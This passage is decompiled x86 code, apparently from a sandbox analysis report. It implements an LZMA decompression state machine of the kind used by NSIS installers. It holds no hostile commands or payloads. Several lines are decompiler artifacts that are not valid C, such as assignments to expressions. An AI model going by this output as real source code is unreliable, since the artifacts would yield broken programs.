                    								if( *(_t613 - 0xc) >= _t565) {
                    									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    									 *(_t613 - 0x40) = 1;
                    									_t532 = _t531 - (_t531 >> 5);
                    									 *_t606 = _t532;
                    								} else {
                    									 *(_t613 - 0x10) = _t565;
                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    								}
                    								if( *(_t613 - 0x10) >= 0x1000000) {
                    									goto L139;
                    								}
                    								L137:
                    								if( *(_t613 - 0x6c) == 0) {
                    									 *(_t613 - 0x88) = 5;
                    									L170:
                    									_t568 = 0x22;
                    									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    									_t535 = 0;
                    									L172:
                    									return _t535;
                    								}
                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    								L139:
                    								_t533 =  *(_t613 - 0x84);
                    								while(1) {
                    									 *(_t613 - 0x88) = _t533;
                    									while(1) {
                    										L1:
                    										_t534 =  *(_t613 - 0x88);
                    										if(_t534 > 0x1c) {
                    											break;
                    										}
                    										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                    											case 0:
                    												if( *(_t613 - 0x6c) == 0) {
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    												_t534 =  *( *(_t613 - 0x70));
                    												if(_t534 > 0xe1) {
                    													goto L171;
                    												}
                    												_t538 = _t534 & 0x000000ff;
                    												_push(0x2d);
                    												asm("cdq");
                    												_pop(_t570);
                    												_push(9);
                    												_pop(_t571);
                    												_t609 = _t538 / _t570;
                    												_t540 = _t538 % _t570 & 0x000000ff;
                    												asm("cdq");
                    												_t604 = _t540 % _t571 & 0x000000ff;
                    												 *(_t613 - 0x3c) = _t604;
                    												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                    												_t612 = (0x300 << _t604 + _t609) + 0x736;
                    												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    													L10:
                    													if(_t612 == 0) {
                    														L12:
                    														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    														goto L15;
                    													} else {
                    														goto L11;
                    													}
                    													do {
                    														L11:
                    														_t612 = _t612 - 1;
                    														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    													} while (_t612 != 0);
                    													goto L12;
                    												}
                    												if( *(_t613 - 4) != 0) {
                    													GlobalFree( *(_t613 - 4));
                    												}
                    												_t534 = GlobalAlloc(0x40, 0x600); // executed
                    												 *(_t613 - 4) = _t534;
                    												if(_t534 == 0) {
                    													goto L171;
                    												} else {
                    													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    													goto L10;
                    												}
                    											case 1:
                    												L13:
                    												__eflags =  *(_t613 - 0x6c);
                    												if( *(_t613 - 0x6c) == 0) {
                    													 *(_t613 - 0x88) = 1;
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    												_t45 = _t613 - 0x48;
                    												 *_t45 =  *(_t613 - 0x48) + 1;
                    												__eflags =  *_t45;
                    												L15:
                    												if( *(_t613 - 0x48) < 4) {
                    													goto L13;
                    												}
                    												_t546 =  *(_t613 - 0x40);
                    												if(_t546 ==  *(_t613 - 0x74)) {
                    													L20:
                    													 *(_t613 - 0x48) = 5;
                    													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    													goto L23;
                    												}
                    												 *(_t613 - 0x74) = _t546;
                    												if( *(_t613 - 8) != 0) {
                    													GlobalFree( *(_t613 - 8));
                    												}
                    												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    												 *(_t613 - 8) = _t534;
                    												if(_t534 == 0) {
                    													goto L171;
                    												} else {
                    													goto L20;
                    												}
                    											case 2:
                    												L24:
                    												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    												 *(_t613 - 0x84) = 6;
                    												 *(_t613 - 0x4c) = _t553;
                    												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                    												L132:
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											case 3:
                    												L21:
                    												__eflags =  *(_t613 - 0x6c);
                    												if( *(_t613 - 0x6c) == 0) {
                    													 *(_t613 - 0x88) = 3;
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												_t67 = _t613 - 0x70;
                    												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    												__eflags =  *_t67;
                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    												L23:
                    												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    												if( *(_t613 - 0x48) != 0) {
                    													goto L21;
                    												}
                    												goto L24;
                    											case 4:
                    												L133:
                    												_t531 =  *_t606;
                    												_t589 = _t531 & 0x0000ffff;
                    												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    												if( *(_t613 - 0xc) >= _t565) {
                    													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    													 *(_t613 - 0x40) = 1;
                    													_t532 = _t531 - (_t531 >> 5);
                    													 *_t606 = _t532;
                    												} else {
                    													 *(_t613 - 0x10) = _t565;
                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    												}
                    												if( *(_t613 - 0x10) >= 0x1000000) {
                    													goto L139;
                    												}
                    											case 5:
                    												goto L137;
                    											case 6:
                    												__edx = 0;
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x34) = 1;
                    													 *(__ebp - 0x84) = 7;
                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    													while(1) {
                    														L132:
                    														 *(_t613 - 0x54) = _t606;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    												__esi =  *(__ebp - 0x60);
                    												__cl = 8;
                    												__cl = 8 -  *(__ebp - 0x3c);
                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    												__ecx =  *(__ebp - 0x3c);
                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    												__ecx =  *(__ebp - 4);
                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    												__eflags =  *(__ebp - 0x38) - 4;
                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												if( *(__ebp - 0x38) >= 4) {
                    													__eflags =  *(__ebp - 0x38) - 0xa;
                    													if( *(__ebp - 0x38) >= 0xa) {
                    														_t98 = __ebp - 0x38;
                    														 *_t98 =  *(__ebp - 0x38) - 6;
                    														__eflags =  *_t98;
                    													} else {
                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    													}
                    												} else {
                    													 *(__ebp - 0x38) = 0;
                    												}
                    												__eflags =  *(__ebp - 0x34) - __edx;
                    												if( *(__ebp - 0x34) == __edx) {
                    													__ebx = 0;
                    													__ebx = 1;
                    													goto L61;
                    												} else {
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__ecx =  *(__ebp - 8);
                    													__ebx = 0;
                    													__ebx = 1;
                    													__al =  *((intOrPtr*)(__eax + __ecx));
                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    													goto L41;
                    												}
                    											case 7:
                    												__eflags =  *(__ebp - 0x40) - 1;
                    												if( *(__ebp - 0x40) != 1) {
                    													__eax =  *(__ebp - 0x24);
                    													 *(__ebp - 0x80) = 0x16;
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x28);
                    													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    													__eax =  *(__ebp - 0x2c);
                    													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    													__eax = 0;
                    													__eflags =  *(__ebp - 0x38) - 7;
                    													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    													__al = __al & 0x000000fd;
                    													__eax = (__eflags >= 0) - 1 + 0xa;
                    													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x664;
                    													__eflags = __eax;
                    													 *(__ebp - 0x58) = __eax;
                    													goto L69;
                    												}
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 8;
                    												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													L132:
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											case 8:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xa;
                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    												} else {
                    													__eax =  *(__ebp - 0x38);
                    													__ecx =  *(__ebp - 4);
                    													__eax =  *(__ebp - 0x38) + 0xf;
                    													 *(__ebp - 0x84) = 9;
                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    												}
                    												while(1) {
                    													L132:
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											case 9:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													goto L89;
                    												}
                    												__eflags =  *(__ebp - 0x60);
                    												if( *(__ebp - 0x60) == 0) {
                    													goto L171;
                    												}
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    												__eflags = _t259;
                    												0 | _t259 = _t259 + _t259 + 9;
                    												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    												goto L76;
                    											case 0xa:
                    												goto L0;
                    											case 0xb:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__ecx =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x20);
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												} else {
                    													__eax =  *(__ebp - 0x24);
                    												}
                    												__ecx =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												goto L88;
                    											case 0xc:
                    												L99:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xc;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t334 = __ebp - 0x70;
                    												 *_t334 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t334;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												__eax =  *(__ebp - 0x2c);
                    												goto L101;
                    											case 0xd:
                    												L37:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xd;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t122 = __ebp - 0x70;
                    												 *_t122 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t122;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L39:
                    												__eax =  *(__ebp - 0x40);
                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    													goto L48;
                    												}
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													goto L54;
                    												}
                    												L41:
                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    												 *(__ebp - 0x48) = __eax;
                    												__eax = __eax + 1;
                    												__eax = __eax << 8;
                    												__eax = __eax + __ebx;
                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edx = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													 *(__ebp - 0x40) = 1;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													__ebx = __ebx + __ebx + 1;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edx;
                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L39;
                    												} else {
                    													goto L37;
                    												}
                    											case 0xe:
                    												L46:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xe;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t156 = __ebp - 0x70;
                    												 *_t156 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t156;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												while(1) {
                    													L48:
                    													__eflags = __ebx - 0x100;
                    													if(__ebx >= 0x100) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x58);
                    													__edx = __ebx + __ebx;
                    													__ecx =  *(__ebp - 0x10);
                    													__esi = __edx + __eax;
                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                    													__ax =  *__esi;
                    													 *(__ebp - 0x54) = __esi;
                    													__edi = __ax & 0x0000ffff;
                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    													__eflags =  *(__ebp - 0xc) - __ecx;
                    													if( *(__ebp - 0xc) >= __ecx) {
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    														__cx = __ax;
                    														_t170 = __edx + 1; // 0x1
                    														__ebx = _t170;
                    														__cx = __ax >> 5;
                    														__eflags = __eax;
                    														 *__esi = __ax;
                    													} else {
                    														 *(__ebp - 0x10) = __ecx;
                    														0x800 = 0x800 - __edi;
                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    														__ebx = __ebx + __ebx;
                    														 *__esi = __cx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														continue;
                    													} else {
                    														goto L46;
                    													}
                    												}
                    												L54:
                    												_t173 = __ebp - 0x34;
                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    												__eflags =  *_t173;
                    												goto L55;
                    											case 0xf:
                    												L58:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xf;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t203 = __ebp - 0x70;
                    												 *_t203 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t203;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L60:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													L55:
                    													__al =  *(__ebp - 0x44);
                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    													goto L56;
                    												}
                    												L61:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t217 = __edx + 1; // 0x1
                    													__ebx = _t217;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L60;
                    												} else {
                    													goto L58;
                    												}
                    											case 0x10:
                    												L109:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x10;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t365 = __ebp - 0x70;
                    												 *_t365 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t365;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												goto L111;
                    											case 0x11:
                    												goto L69;
                    											case 0x12:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 0x58);
                    													 *(__ebp - 0x84) = 0x13;
                    													__esi =  *(__ebp - 0x58) + 2;
                    													while(1) {
                    														L132:
                    														 *(_t613 - 0x54) = _t606;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												__eflags = __eax;
                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                    												goto L130;
                    											case 0x13:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													_t469 = __ebp - 0x58;
                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                    													__eflags =  *_t469;
                    													 *(__ebp - 0x30) = 0x10;
                    													 *(__ebp - 0x40) = 8;
                    													L144:
                    													 *(__ebp - 0x7c) = 0x14;
                    													goto L145;
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												 *(__ebp - 0x30) = 8;
                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    												L130:
                    												 *(__ebp - 0x58) = __eax;
                    												 *(__ebp - 0x40) = 3;
                    												goto L144;
                    											case 0x14:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    												__eax =  *(__ebp - 0x80);
                    												 *(_t613 - 0x88) = _t533;
                    												goto L1;
                    											case 0x15:
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xb;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    												goto L120;
                    											case 0x16:
                    												__eax =  *(__ebp - 0x30);
                    												__eflags = __eax - 4;
                    												if(__eax >= 4) {
                    													_push(3);
                    													_pop(__eax);
                    												}
                    												__ecx =  *(__ebp - 4);
                    												 *(__ebp - 0x40) = 6;
                    												__eax = __eax << 7;
                    												 *(__ebp - 0x7c) = 0x19;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L145;
                    											case 0x17:
                    												L145:
                    												__eax =  *(__ebp - 0x40);
                    												 *(__ebp - 0x50) = 1;
                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    												goto L149;
                    											case 0x18:
                    												L146:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x18;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t484 = __ebp - 0x70;
                    												 *_t484 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t484;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L148:
                    												_t487 = __ebp - 0x48;
                    												 *_t487 =  *(__ebp - 0x48) - 1;
                    												__eflags =  *_t487;
                    												L149:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__ecx =  *(__ebp - 0x40);
                    													__ebx =  *(__ebp - 0x50);
                    													0 = 1;
                    													__eax = 1 << __cl;
                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    													__eax =  *(__ebp - 0x7c);
                    													 *(__ebp - 0x44) = __ebx;
                    													while(1) {
                    														 *(_t613 - 0x88) = _t533;
                    														goto L1;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x50);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    												__eax =  *(__ebp - 0x58);
                    												__esi = __edx + __eax;
                    												 *(__ebp - 0x54) = __esi;
                    												__ax =  *__esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													__cx = __ax >> 5;
                    													__eax = __eax - __ecx;
                    													__edx = __edx + 1;
                    													__eflags = __edx;
                    													 *__esi = __ax;
                    													 *(__ebp - 0x50) = __edx;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L148;
                    												} else {
                    													goto L146;
                    												}
                    											case 0x19:
                    												__eflags = __ebx - 4;
                    												if(__ebx < 4) {
                    													 *(__ebp - 0x2c) = __ebx;
                    													L119:
                    													_t393 = __ebp - 0x2c;
                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                    													__eflags =  *_t393;
                    													L120:
                    													__eax =  *(__ebp - 0x2c);
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    														goto L170;
                    													}
                    													__eflags = __eax -  *(__ebp - 0x60);
                    													if(__eax >  *(__ebp - 0x60)) {
                    														goto L171;
                    													}
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    													__eax =  *(__ebp - 0x30);
                    													_t400 = __ebp - 0x60;
                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    													__eflags =  *_t400;
                    													goto L123;
                    												}
                    												__ecx = __ebx;
                    												__eax = __ebx;
                    												__ecx = __ebx >> 1;
                    												__eax = __ebx & 0x00000001;
                    												__ecx = (__ebx >> 1) - 1;
                    												__al = __al | 0x00000002;
                    												__eax = (__ebx & 0x00000001) << __cl;
                    												__eflags = __ebx - 0xe;
